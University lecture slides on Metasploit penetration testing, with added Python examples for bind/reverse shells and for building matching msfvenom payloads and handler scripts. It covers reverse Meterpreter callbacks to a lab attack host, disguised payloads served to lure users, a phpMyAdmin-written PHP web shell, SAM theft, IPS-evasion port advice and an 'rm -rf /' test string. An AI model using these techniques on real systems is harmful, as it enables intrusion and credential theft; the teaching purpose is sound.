Chapter 6-8 - Exploitation

Penetration Testing

Using the
Metasploit Framework
Dr. Tran The Son
Vietnam – Korea University
Metasploit Framework
• The Metasploit Framework is an open-source security
project that offers penetration-testing and
exploit-development features.
• All of these features are packaged as a set of
modules
Metasploit Modules
• Module paths: /usr/share/metasploit-framework/modules/ (the framework's own modules) and ~/.msf4/modules/ (modules you add yourself)
• (1) Payloads
– Single payloads are self-contained: the complete malicious code is delivered
to the target machine in one piece.
– Staged payloads consist of a small stub loader (the stager) that, once executed on
the target machine, calls back to the attack machine to fetch the final piece of the
payload (the stage).
• (2) Exploits
– the modules used to take over a target machine by triggering a
vulnerability and running a payload on it.
• (3) Encoders
– play the role of code scramblers: they re-encode payload bytes, e.g. to avoid
characters such as null bytes that an exploit cannot deliver. They are not a
reliable antivirus-evasion technique.
• (4) Listeners (handlers)
– used to establish and manage the connection between the attack machine and
the target machine (exploit/multi/handler; they are not a separate module directory)
• (5) Auxiliary modules
– supplementary tools used for other penetration-testing tasks, such as
scanning, fuzzing and sniffing; they carry no payload.
Metasploit Update
• Check the version and update
msfconsole -v
msfupdate
(msfupdate only updates a git checkout; for the Kali package use apt instead)
OR:
sudo apt update; sudo apt install metasploit-framework

• Since Metasploit is a Ruby project, Bundler tracks and installs the exact
gems required to run it (needed for a source checkout, not for the apt package):
sudo gem install bundler
• Upgrade the Metasploit framework package
sudo apt-get upgrade metasploit-framework
• Re-initialise the Metasploit database (drops and recreates it, so saved hosts,
credentials and loot are lost)
sudo msfdb reinit
Metasploit Startup
• Starting
msfconsole
(start the PostgreSQL database first with sudo msfdb init, so that module search,
workspaces and stored hosts work)
• Interfaces
– msfconsole: the interactive, text-based console; the main way to use the framework
– msfcli: the non-interactive command-line interface. It was removed from the
framework in 2015; its job is now done by msfconsole -x "<commands>" or
msfconsole -r <script.rc>
Finding Metasploit Modules
• Do not confuse the two meanings of "module": in Windows, a module is an
executable file or DLL loaded into a process (each process consists of one or
more modules); in Metasploit, a module is a Ruby file that implements one
exploit, payload, encoder or auxiliary tool.
• How do we know that a given patch is missing on our
Windows XP target?
– E.g. MS08-067 in netapi32.dll

MS08-067 patched an issue in netapi32.dll that allowed attackers to use a
specially crafted remote procedure call (RPC) request, delivered over the Server
Message Block (SMB) service, to take over a target system. Searching the module
database for the bulletin number (search ms08_067) finds the matching exploit,
exploit/windows/smb/ms08_067_netapi; its check command (or Nmap's
smb-vuln-ms08-067 script) tells us whether the host is unpatched before we fire it.
The Module Database
• You can use Rapid7's module search page to match
Metasploit modules to vulnerabilities (search by CVE,
Microsoft bulletin number or product name)

Online database of modules: http://www.rapid7.com/db/modules/
Built-In Search
• Search modules from the console: search <term> (for example
search ms08_067, or search type:exploit platform:windows smb);
then info <module> shows the module's details
• Details shown by info:
– Privileged tells us whether this module requires or grants high
privileges on the target.
– Rank reflects how reliable the exploit is and how likely it is to
crash the target: modules are ranked from manual (needs hand
configuration and may be unstable) up to excellent (should never
crash the service).
– Basic options lists the module's settings (show options), which
can be set to make the module better meet our needs.
– Payload contains the constraints (available space, bad characters,
platform) that help Metasploit decide which payloads it can use with
this exploit. Payloads, or shellcode, tell the exploited system what
to do on behalf of the attacker.
Exercise
• Examine the folder structure of the Metasploit modules directory
– payloads
– exploits
– encoders
– listeners (find where exploit/multi/handler actually lives)
– auxiliary
• Examine the code
– Example.rb (Metasploit modules are written in Ruby; the modules tree also
holds a few external modules written in Python, e.g. Example.py)
Setting Module Options
• Metasploit fills in sensible defaults where it can, but the options it
cannot guess must be set by hand (show options lists them and marks
the required ones):
– RHOST refers to the remote host we want to exploit (newer versions
call it RHOSTS and also accept address ranges or files of targets).
– RPORT refers to the remote port to attack; keep the default
(445 for SMB).
– SMBPIPE: like the RPORT value, keep the default for SMBPIPE,
BROWSER.
– Exploit Target: the target operating system and version. To set a
target option, enter: set target <target number> (show targets lists
the numbers; the default, Automatic Targeting, fingerprints the host
and is usually what we want).
Payloads (or Shellcode)
• What do we do once the target has been exploited? The payload is the code
that runs on the target after the exploit succeeds.
• One of the ways that Metasploit makes things easier is by building and
delivering our payloads for us
• Metasploit has a plethora of payloads, ranging from simple
Windows commands to the extensible Metasploit
Meterpreter
• Payloads, in simple terms, are small programs the attacker uses to
interact with a compromised system, for instance to run commands or
transfer data to and from the victim.
Singles − self-contained payloads that do one job and have no second stage, e.g.
adding a user (windows/adduser) or a plain command shell (windows/shell_reverse_tcp).
Stagers − very small payloads whose only job is to set up a communication channel
back to the attacker and then pull in the next stage; used when the exploit only has
room for a few hundred bytes of shellcode.
Stages − payload components that are downloaded by the stagers. Because they arrive
over the already-established channel they have no size limit and provide advanced
features such as Meterpreter and VNC injection.
Naming: a slash separates stager and stage (windows/meterpreter/reverse_tcp is staged);
an underscore marks a single, stageless payload (windows/meterpreter_reverse_tcp).
Finding Compatible Payloads
• Inside the exploit, show payloads lists only the payloads that are
compatible with the selected module and target
A Test Run

Meterpreter is short for meta-interpreter, Metasploit's unique payload: it runs
inside the memory of the exploited process, extends itself over the session with
additional commands and modules, and never needs to touch the disk.

By default Metasploit listens on port 4444. In our lab there is nothing wrong with this;
it will work just fine. On real engagements, however, even primitive intrusion-prevention
software may take note of traffic on port 4444, recognise it as Metasploit ("Hey, you are
Metasploit, go away!") and drop the connection, so set LPORT to something less
conspicuous, for example 443.
Exercise
• Start Metasploit
• Look up information about the MS08-067 vulnerability
– Identify the Metasploit module that exploits this
vulnerability
• Use this module to exploit the vulnerability on the Windows XP
machine
– Set RHOST
– Run exploit
Types of Shells
• Meterpreter or otherwise, shells fall into two
categories: bind and reverse.
• A bind shell instructs the target
machine to open a command
shell and listen on a local port.
The attack machine then
connects to the target machine
on the listening port. This only
works when inbound connections
to the target are allowed (no NAT
or host firewall in the way).
• A reverse shell, on the other
hand, actively pushes a
connection back to the attack
machine rather than waiting for
an incoming connection. Because
the connection is outbound from the
target, it usually passes NAT and
egress firewalls, which is why reverse
payloads are the usual choice.
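To make the two directions concrete, here is a self-contained Python demonstration of a bind shell and a reverse shell on localhost. It is an added example, not code from these slides or from Metasploit; the "shell" on the target side is a constructed toy that runs only an allow-list of harmless commands, and the ephemeral loopback ports stand in for the 4444 you would see in msfconsole.

```python
"""Bind shell vs reverse shell, shown end to end on localhost.

Added example for the 'Types of Shells' slide; not code from the original
deck or from Metasploit.  Both 'shells' are deliberately toy ones: the
target side executes only an allow-list of harmless commands, so the demo
is safe to run, but the connection directions are exactly those of
windows/shell_bind_tcp and windows/shell_reverse_tcp.
"""
import socket
import subprocess
import threading

# Constructed allow-list: the toy shell will run nothing else.
ALLOWED = {"echo", "id", "whoami"}


def run_command(line: str) -> str:
    """The target's 'shell': run one allow-listed command, return its output."""
    parts = line.split()
    if not parts or parts[0] not in ALLOWED:
        return f"denied: {line!r}\n"
    done = subprocess.run(parts, capture_output=True, text=True)
    return done.stdout or done.stderr


def serve_shell(conn: socket.socket) -> None:
    """Target side: read one command line, run it, send the output, close."""
    with conn:
        buf = b""
        while not buf.endswith(b"\n"):
            chunk = conn.recv(4096)
            if not chunk:          # peer went away before finishing the line
                break
            buf += chunk
        conn.sendall(run_command(buf.decode(errors="replace").strip()).encode())


def drive_shell(conn: socket.socket, cmd: str) -> str:
    """Attacker side: send one command, collect output until the target closes."""
    with conn:
        conn.sendall(cmd.encode() + b"\n")
        conn.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def _listener() -> socket.socket:
    """Listening socket on an ephemeral loopback port (stands in for 4444)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv


def bind_shell(cmd: str) -> str:
    """Bind shell: the TARGET listens, the attacker connects in.
    Fails in practice whenever NAT or a host firewall blocks inbound traffic."""
    target_listener = _listener()
    port = target_listener.getsockname()[1]

    def target_side():
        conn, _ = target_listener.accept()
        serve_shell(conn)

    t = threading.Thread(target=target_side)
    t.start()
    attacker = socket.create_connection(("127.0.0.1", port))   # inbound to target
    output = drive_shell(attacker, cmd)
    t.join()
    target_listener.close()
    return output


def reverse_shell(cmd: str) -> str:
    """Reverse shell: the ATTACKER listens (this is what multi/handler does),
    the target connects back.  Outbound from the target, so it usually passes
    NAT and egress firewalls, which is why reverse payloads are the default."""
    handler = _listener()
    lport = handler.getsockname()[1]           # the handler's LPORT

    def target_side():
        conn = socket.create_connection(("127.0.0.1", lport))  # LHOST:LPORT
        serve_shell(conn)

    t = threading.Thread(target=target_side)
    t.start()
    conn, _ = handler.accept()
    output = drive_shell(conn, cmd)
    t.join()
    handler.close()
    return output


if __name__ == "__main__":
    print("bind:   ", bind_shell("echo hello from bind shell").strip())
    print("reverse:", reverse_shell("echo hello from reverse shell").strip())
    print("blocked:", reverse_shell("rm -rf /").strip())
```

Note which side calls listen() in each function: that single difference is the whole bind-versus-reverse distinction, and it decides which side's firewall has to let the connection through.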
Metasploit handlers
• Metasploit handlers are the listeners to use for Meterpreter
and most reverse shells.
– A handler (exploit/multi/handler) is a generic "exploit" that delivers nothing:
it only waits for the payload to connect back and then turns that connection
into a Metasploit session. It must be listening before the payload runs, and its
PAYLOAD, LHOST and LPORT must match the payload that was generated.
– Not to be confused with an operating-system handle, the small opaque value a
process uses to refer to a kernel object.

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
exploit
(exploit -j runs the handler as a background job so the console stays usable)
Setting a Payload Manually

Because this is a reverse shell, we need to tell the target where to
send the shell; specifically, we need to give it the IP address of the
attack machine and the port we will listen on (set PAYLOAD <name>, then
set LHOST and LPORT).

LHOST is our local host on the Kali machine: the IP address we want our
target machine to connect back to. It must be an address the target can
actually reach (check with ip addr), not 127.0.0.1 and not an address
behind NAT that the target cannot route to.
e.g.
set LHOST 192.168.20.9
Lab Exercise
• Exploit the MS08-078 vulnerability
– Identify the vulnerable Windows OS versions
– Identify the risk level
– Scan
– Exploit in two ways: with a bind payload and with a reverse payload
• Exploit the MS17-010 vulnerability (CVE-2017-0143)
– Identify the vulnerable Windows OS versions
– Identify the risk level
– Scan (auxiliary/scanner/smb/smb_ms17_010)
– Exploit
Hint:
https://learn.microsoft.com/en-us/security-updates/securitybulletins
Msfvenom
• Msfvenom was added to Metasploit in 2011 (it merged the older
msfpayload and msfencode tools, which were retired in 2015).
• It is used to create standalone, optionally encoded
Metasploit payloads in a variety of output formats,
such as Windows executables and ASP pages
• Instead of relying on a missing patch or another security
issue, here we exploit the one security issue that
may never be fully patched: the users.
• Msfvenom lets us build standalone payloads to run
on a target system in an attempt to exploit the user, whether
through a social-engineering attack or by uploading the
payload to a vulnerable server
Msfvenom
• Choosing a Payload

root@kali:~# msfvenom -l payloads

Name                               Description
----                               -----------
aix/ppc/shell_bind_tcp             Listen for a connection and spawn a command shell
aix/ppc/shell_find_port            Spawn a shell on an established connection
aix/ppc/shell_interact             Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp          Connect back to attacker and spawn a command shell
android/meterpreter/reverse_http   Run a meterpreter server in Android. Tunnel communication over HTTP
android/meterpreter/reverse_https  Run a meterpreter server in Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp    Run a meterpreter server in Android. Connect back stager
android/meterpreter_reverse_http   Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_https  Connect back to attacker and spawn a Meterpreter shell
...
Msfvenom
• Choosing an Output Format (-f): msfvenom -l formats lists the executable
formats (exe, dll, asp, psh, elf, ...) and the transform formats (raw, c, python, ...)

• A complete invocation combines the payload (-p), its options (LHOST=...,
LPORT=...), the output format (-f) and an output file (-o). The LHOST and
LPORT baked into the file must match the handler that will catch it.
Msfvenom
• Serving Payloads
• One good way to serve up payloads is to host them on a
web server, disguise them as something useful, and lure
users into downloading them
• E.g.
– Copy the generated executable to Apache's web root on Kali, /var/www/html,
and make sure Apache is running (service apache2 start)
– On the Windows XP target, open Internet Explorer, browse to
http://192.168.20.9/chapter4example.exe and download the file
Msfvenom
• Using the Multi/Handler Module
• This module lets us set up a standalone handler to
catch the Meterpreter connection when our malicious
executable is run on the Windows XP target. It must already be
listening, with the same PAYLOAD, LHOST and LPORT that were used
when the executable was generated, before the user runs the file.
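The handler must be started with exactly the PAYLOAD, LHOST and LPORT that were baked into the msfvenom payload, and the same use / set / exploit sequence drives the MS08-067 exercise from the "Setting Module Options" slide. The following Python script is an added example, not code from the slides or from Metasploit: it builds the msfvenom command line and matching msfconsole resource scripts (.rc files, run with msfconsole -q -r handler.rc), checks that payload and handler agree, and warns about the default port 4444. The addresses 192.168.20.9 (Kali) and 192.168.20.10 (target) are the lab's; every function name is this script's own, and msfvenom is only executed if it is installed.

```python
"""Keep an msfvenom payload and the multi/handler that catches it in sync.

Added example for these slides; not code from the deck or from Metasploit.
It builds the msfvenom argument list and msfconsole resource scripts, checks
that they agree, and runs msfvenom only if it is on PATH.  Addresses are the
lab network's (192.168.20.9 = Kali, 192.168.20.10 = target); all function
names are this script's own.
"""
import shutil
import subprocess
from pathlib import Path

DEFAULT_LPORT = 4444   # Metasploit's default; IPS products key on it


def check_lport(lport: int) -> str:
    """Warning text if lport is the well-known default, else an empty string."""
    if lport == DEFAULT_LPORT:
        return ("LPORT 4444 is Metasploit's default and is easily flagged; "
                "prefer 443 or 8443 on a real engagement")
    return ""


def msfvenom_argv(payload: str, lhost: str, lport: int, fmt: str, out) -> list:
    """msfvenom -p <payload> LHOST=.. LPORT=.. -f <format> -o <file>"""
    return ["msfvenom", "-p", payload, f"LHOST={lhost}", f"LPORT={lport}",
            "-f", fmt, "-o", str(out)]


def resource_script(module: str, options: dict, payload: str = "",
                    background: bool = False) -> str:
    """msfconsole .rc text: use <module>, set PAYLOAD, set <options>, exploit.
    background=True emits 'exploit -j' so a handler keeps running as a job
    while the console stays usable."""
    lines = [f"use {module}"]
    if payload:
        lines.append(f"set PAYLOAD {payload}")
    lines += [f"set {key} {value}" for key, value in options.items()]
    lines.append("exploit -j" if background else "exploit")
    return "\n".join(lines) + "\n"


def handler_rc(payload: str, lhost: str, lport: int) -> str:
    """The 'Using the Multi/Handler Module' slide as a resource script."""
    return resource_script("exploit/multi/handler",
                           {"LHOST": lhost, "LPORT": lport},
                           payload=payload, background=True)


def ms08_067_rc(rhost: str, lhost: str, lport: int) -> str:
    """The MS08-067 exercise: RHOSTS (RHOST on old versions) on the exploit,
    reverse Meterpreter back to our LHOST:LPORT."""
    return resource_script("exploit/windows/smb/ms08_067_netapi",
                           {"RHOSTS": rhost, "LHOST": lhost, "LPORT": lport},
                           payload="windows/meterpreter/reverse_tcp")


def handler_matches(argv: list, rc_text: str) -> bool:
    """Sanity check before firing: PAYLOAD, LHOST and LPORT in the msfvenom
    command must be exactly what the handler will listen with."""
    payload = argv[argv.index("-p") + 1]
    opts = dict(arg.split("=", 1) for arg in argv if "=" in arg)
    wanted = {f"set PAYLOAD {payload}",
              f"set LHOST {opts['LHOST']}", f"set LPORT {opts['LPORT']}"}
    return wanted <= set(rc_text.splitlines())


def build(payload: str, lhost: str, lport: int, fmt: str, out_dir) -> tuple:
    """Write handler.rc next to the payload so LHOST/LPORT cannot drift apart;
    generate the payload only if msfvenom is installed."""
    out_dir = Path(out_dir)
    out_dir.mkdir(parents=True, exist_ok=True)
    argv = msfvenom_argv(payload, lhost, lport, fmt, out_dir / f"payload.{fmt}")
    rc_path = out_dir / "handler.rc"
    rc_path.write_text(handler_rc(payload, lhost, lport))
    if shutil.which("msfvenom"):
        subprocess.run(argv, check=True)
    return argv, rc_path


if __name__ == "__main__":
    argv, rc = build("windows/meterpreter/reverse_tcp", "192.168.20.9", 443, "exe", "out")
    print(" ".join(argv))
    print(rc.read_text())
    print(check_lport(4444))
    print(ms08_067_rc("192.168.20.10", "192.168.20.9", 443))
```

Generating the handler script from the same variables as the payload removes the most common reason a Meterpreter session never arrives: a handler listening on a different port, or for a staged payload when a stageless one was built.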
Exploiting WebDAV Default Credentials
• XAMPP installed on the Windows XP target uses default
login credentials for the WebDAV folder that is used
to upload files to the web server.
– This issue allows us to upload our own pages to the server with
Cadaver, a command-line WebDAV client, which we used earlier to
verify this vulnerability
Exploiting WebDAV Default Credentials
• Running a Script on the Target Web Server
Exploiting WebDAV Default Credentials
• Uploading a Msfvenom Payload

Because the server runs PHP, a PHP payload from msfvenom is enough:
we can create a simple shell (1), download and execute a file on the
system (2), or even use Meterpreter (3).
Exploiting WebDAV Default Credentials
• Generate a payload with msfvenom (e.g. -p php/meterpreter/reverse_tcp -f raw)

• Upload it using WebDAV (Cadaver's put command)

Exploiting WebDAV Default Credentials
• Set up a handler in Msfconsole to catch the payload
before executing the script

Use multi/handler in Msfconsole, set the payload to
php/meterpreter/reverse_tcp (1), and set LHOST (2) and
LPORT (3) to match the generated payload.
Exploiting Open phpMyAdmin
• By accessing the MySQL database, we can perform
an attack similar to our WebDAV attack and write
scripts into the web server's document root using MySQL
queries (SELECT ... INTO OUTFILE), because MySQL runs as a
local service account with write access to the disk
– To explore this attack, first navigate to
http://192.168.20.10/phpmyadmin (the install is "open": no login is required)

The default install location for XAMPP's Apache on Windows is C:\xampp,
so a file written under C:\xampp\htdocs is served by the web server.
Exploiting Open phpMyAdmin
• Run the completed query in phpMyAdmin, and then
browse to the newly created file,
http://192.168.20.10/shell.php?cmd=............
Exploiting Open phpMyAdmin
• Rather than creating a really long and complicated
SQL SELECT query, we can host a file on our Kali
machine and then use our PHP shell to pull it down
to the web server

• Now we can browse to
http://192.168.20.10/meterpreter.php
Note: Be sure to restart the handler to catch the Meterpreter
connection before executing the script; a handler that has already
caught one session exits unless ExitOnSession was set to false.
Downloading Sensitive Files
• Downloading a Configuration File
• Downloading the Windows SAM
Exploiting a Buffer Overflow
• SLMail 5.5 mail server
• Its POP3 service is vulnerable to CVE-2003-0264, a buffer overflow
triggered by an overly long argument to a POP3 command (the classic case
is the PASS command).
Exploiting Third-Party Web Applications
Exploiting a Compromised Service
